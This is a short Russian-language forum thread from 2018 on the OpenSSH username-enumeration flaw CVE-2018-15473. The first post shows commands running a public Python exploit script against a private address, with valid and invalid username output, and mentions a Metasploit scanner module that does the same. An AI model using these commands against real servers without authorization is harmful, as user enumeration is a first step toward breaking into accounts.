HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2018, 19:01
sosiskapi
Новичок
Регистрация: 28.12.2016
Сообщений: 0
С нами: 4934532

Репутация: 0
По умолчанию

Очень мало ознакомился с данной уязвимостью, надеюсь мне помогут и знающие люди допишут полезной инфы в комментах.
Скрипт на питоне по адресу Exploit позволяет перечислять имена пользователей.
Пример с правельным username
└──╼ $python2.7 45210.py --port 22 192.168.1.2 root
[+] Valid username
Не правильный
└──╼ $python2.7 45210.py --port 22 192.168.1.2 admin[*] Invalid username
Так и не понял суматохи по поводу этой уязвимости, ведь есть auxiliary(scanner/ssh/ssh_enumusers) которая , также помогает узнать username
 
Ответить с цитированием

  #2  
Старый 01.09.2018, 12:06
Letun
Новичок
Регистрация: 09.02.2018
Сообщений: 0
С нами: 4345687

Репутация: 0
По умолчанию

А была суматоха?
 
Ответить с цитированием

  #3  
Старый 02.09.2018, 04:09
sosiskapi
Новичок
Регистрация: 28.12.2016
Сообщений: 0
С нами: 4934532

Репутация: 0
По умолчанию

Цитата:

Letun сказал(а):

А была суматоха?

Согласен сумтохи нет. Проблема с перебором пользователей ssh, как я понял уже давно.
Прост вычитал решил поделиться.
eng enumeration-cve-2018-15473
РУС attackers-guess-username
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.